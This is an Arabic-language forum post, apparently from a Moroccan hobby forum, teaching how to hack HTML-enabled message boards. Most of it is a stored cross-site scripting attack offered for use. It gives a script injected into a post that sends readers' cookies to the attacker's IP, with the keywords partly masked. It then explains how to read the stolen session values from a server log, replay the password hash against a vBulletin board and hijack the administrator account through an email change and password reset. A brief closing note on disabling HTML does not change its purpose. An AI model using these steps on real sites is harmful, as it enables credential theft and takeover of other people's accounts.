tourisme
السلام عليكم ورحمة الله و بركاته أعزائي الاعضاء نرحب بكم في المنتدى المتواضع نتمنى أن تستفيدو منه مع فائق تحياتي المدير أمير النت


منتدى ثقافي الأفضل
 
الرئيسيةالبوابةاليوميةس .و .جمكتبة الصوربحـثالأعضاءالمجموعاتالتسجيلدخول

شاطر | 
 

 ختراق المنتديات عن طريق ثغرة Html

اذهب الى الأسفل 
كاتب الموضوعرسالة
أمير النت
Admin
Admin
avatar

عدد المساهمات : 310
نقاط : 107099
تاريخ التسجيل : 16/09/2011
العمر : 27

30012014
مُساهمةختراق المنتديات عن طريق ثغرة Html





بسم الله الرحمن الرحيم
طبعا في البداية اخواني اقسم بالله العضيم ان لا استعمل هذه الطريقة ضد المنتيدات المسلمة بل ضد المنتديات الي تسيئ الى الاسلام
-
طرق اختراق المنتديات مجربه وفعاله
-
شرح الاختراق
-
الثغرة :
---------
-
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML
-
قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
<******>document.write('<img
src="http://my_ip_address/'+document.******************************e+'">';</******>
-
مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .
-
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى
ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
-
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
-
ابحث عن الكود الخاص بالباسورد .. مثال :
-
GET/ bbuserid=86;%20bbpassword=dd61
69d68822a116cd97e1fb
-
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f
8;%20bbthreadview[54
-
20]=1012444064;%20bblastvi
sit=1011983161
-
فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?b...%5D&bbpassword[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..
-
اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !
-----------
الحل
-----------
للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )



كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <******> فاذا وضعت <img> او <Demon> او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ

تحياتي ............

_________________
lol! الحياة العلم الإستفادة من أجل تحسين القدرات king
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://tourisme.forummaroc.net

 مواضيع مماثلة

-
» كود وضع اكثر من ستايل لمنتداك
» كود ساعه رقميه
» كود المتواجدون باعلام الدول
» كوشة كودات html مهمة للكل.....
» كود وضع صفحة html داخل اطار..
مُشاطرة هذه المقالة على: diggdeliciousredditstumbleuponslashdotyahoogooglelive

ختراق المنتديات عن طريق ثغرة Html :: تعاليق

لا يوجد حالياً أي تعليق
 

ختراق المنتديات عن طريق ثغرة Html

الرجوع الى أعلى الصفحة 

صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
tourisme :: المعلوميات :: مدونة الهاكر-
انتقل الى: